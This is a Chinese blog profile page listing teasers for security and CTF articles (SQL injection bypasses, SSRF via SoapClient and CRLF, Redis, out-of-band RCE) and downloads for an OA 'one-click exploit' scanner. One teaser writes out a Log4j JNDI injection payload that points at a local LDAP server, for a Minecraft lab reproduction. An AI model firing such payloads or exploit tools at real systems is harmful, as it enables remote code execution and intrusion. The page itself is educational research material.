自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(12)
  • 收藏
  • 关注

原创 Session反序列化利用和SoapClient+crlf组合拳进行SSRF详解

简单举个例子还有一个很重要的利用点,CRLF头注入,一个在user_agent,一个在uri,可惜的是这种方式只支持http协议不熟悉CRLF头注入的利用方法咱们开始小课堂:CRLF注入漏洞指的是(CR,ASCII 13,\r,%0d) 和CRLF的概念源自打字机,表明行的结束,计算机出现后沿用了这个概念。回车符:光标移到行首,换行符:光标垂直移到下行。键盘上的回车键(Enter)就可以执行该操作。但是不同的操作系统,行的结束符是不一样的。Windows:使用CRLF表示行的结束。

2023-06-21 11:27:47 390

原创 【记一次】Log4j 漏洞在《我的世界》上复现

首先我们需要一个jndi服务用于漏洞注入,可以在GitHub下载一个jar包(https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0)构造出payload:${jndi:ldap://127.0.0.1:1389/abzi13},然后启动游戏,随便创建个世界进入,按T打开聊天窗口输入payload,即可弹出计算器程序。其次,当然我们需要一个《我的世界》的客户端(目前仅测试1.12.2版本)

2024-06-10 10:45:20 424 1

原创 【CTF】sql注入之无列名注入的姿势

顾名思义,就是在不知道列名的情况下进行 sql 注入。在 mysql => 5 的版本中存在一个名为 information_schema 的库,里面记录着 mysql 中所有表的结构。通常,在 mysql sqli 中,我们会通过此库中的表去获取其他表的结构,也就是表名、列名等。但是这个库经常被 WAF 过滤。当我们通过暴力破解获取到表名后,如何利用呢?

2023-11-27 22:01:44 533

原创 sql注入绕过姿势

所以即使你后面输入了这些sql命令,也不会被当成sql命令来执行了, 因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的, 只会被当做字符串字面值参数。或者对用户的输入信息进行严格的过滤,比如日期、年份等格式进行严格限制。1)如果 waf 过滤了逗号,并且只能盲注,在取子串的几个函数中,有一个替代逗号的方法就是使用 from for ,其中 pos 代表从 pos 个开始读取 len 长度的子串。

2023-11-14 22:24:14 159

原创 [GYCTF2020]Blacklist 1

报错注入原理就是我们自己构造请求参数,使接口或者后端返回错误,以达到让我们更多的了解select、update、insert语句的问题所在总之,这道题还是挺简单的。。。

2023-11-14 22:20:56 178

原创 WPS 2012-2013通杀漏洞(CVE-2013-3934)

本站提供exp仅供安全研究与教学之用,风险自负!

2023-09-14 15:48:37 111 1

原创 Redis漏洞及搭配ssrf利用的姿势

这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!

2023-06-24 10:26:16 2480

原创 带外攻击(OOB)RCE无回显思路总结详解

向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据。

2023-06-23 15:15:01 2468

原创 PHP原生类详解

什么是php原生类PHP 原生类指的是 PHP 内置的类,它们可以直接在 PHP 代码中使用且无需安装或导入任何库。以下是一些常用的 PHP 原生类:1. DateTime 类:用于处理日期和时间,支持各种格式和时间区域。2. PDO 类:用于访问和操作关系型数据库,如 MySQL、PostgreSQL 等。3. FilesystemIterator 类:用于迭代文件系统目录,支持过滤器和递归。4. DOMDocument 类:用于创建和操作 XML 文档,支持 XPath 查询和转换。

2023-06-21 20:20:10 1085

原创 PHP反射类详解

反射是一个动态运行的概念,综合使用他妈可用来帮助我们分析其他类,接口,方法,属性和扩展,还可构建模式,比如动态代理,在一些php框架中使用反射也是很经常,比如kohana,yii,下面是kohana的实现mvc的代码,就是用到了反射!这个类返回时某个类的相关信息,比如 属性,方法,命名空间,实现那些接口等!PHP的反射机制使开发者能够在运行时获取类、方法和属性的信息,并且可以在不知道这些类、方法和属性名称的情况下与它们交互。只不过这里是反着来的,方法在前,对象在后。以上是获取属性的,还有获取类方法的。

2023-06-21 17:55:49 1025

原创 BUUCTF-[网鼎杯 2020 青龙组]AreUSerialz

这里绕过方法就是直接改成public,原因是php7.1以上的版本对属性类型不敏感类型,而public属性序列化不会不可见字符。绕过方法:可以使传入的op是数字2,从而使第一个强比较返回false,而使第二个弱比较返回true。这里注意protacted在序列化之后会出现不可见字符\00*\100,不符合上面的要求。这里的destruct()魔术方法会在传参是2的字符的时候,对传入的参数进行赋值。这里的比较是===强比较,而在process()函数是弱比较。这里需要传入一个序列化之后的类对象。

2023-06-21 15:48:31 137

原创 3D跳动的爱心,超高级!!!

【代码】3D跳动的爱心,超高级!!!

2023-06-20 21:55:27 1929 1

oa通达扫描工具,一键扫描和利用,个人感觉非常好用

oa通达扫描工具,一键扫描和利用,个人感觉非常好用,点开一键利用就行

2023-06-28

crc-master碰撞工具

我们可以做2个CRC64(左移): 设CRC64权(左移)=0x42F0E1EBA9EA3693 CRC64校验和=0x012345678ABCDEF 要求: CRC64明文1=0x1122334455667788 CRC64明文2=0x8877665544332211 那么CRC64的2个初值为多少??? 因为CRC64的初值我们无法立即得到,但我们可以间接得到: 在CRC正运算即CRC编码(对称)矩阵中,初值和明文可以相互交换。 在CRC逆运算即CRC解码(非对称)矩阵中,密文和初值锁定明文,密文和明文锁定初值。 故CRC64的初值1: CRC64权=0x42F0E1EBA9EA3693 CRC64初值1=0x1122334455667788(先用明文1替代) CRC64校验和=0x012345678ABCDEF(就是密文1或密文2) 求CRC64的逆运算即查CRC64的解码表,得到 CRC64明文1=0x2D6FD3ADE7D797FD(此时是逆运算时的明文) 故CRC64初值1=0x2D6FD3ADE7D797FD和CRC64明文1=0x1122334455667788

2023-06-24

wireshark 中科磐云环境 全

wireshark环境全,几乎都是国赛的原题

2023-06-20

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除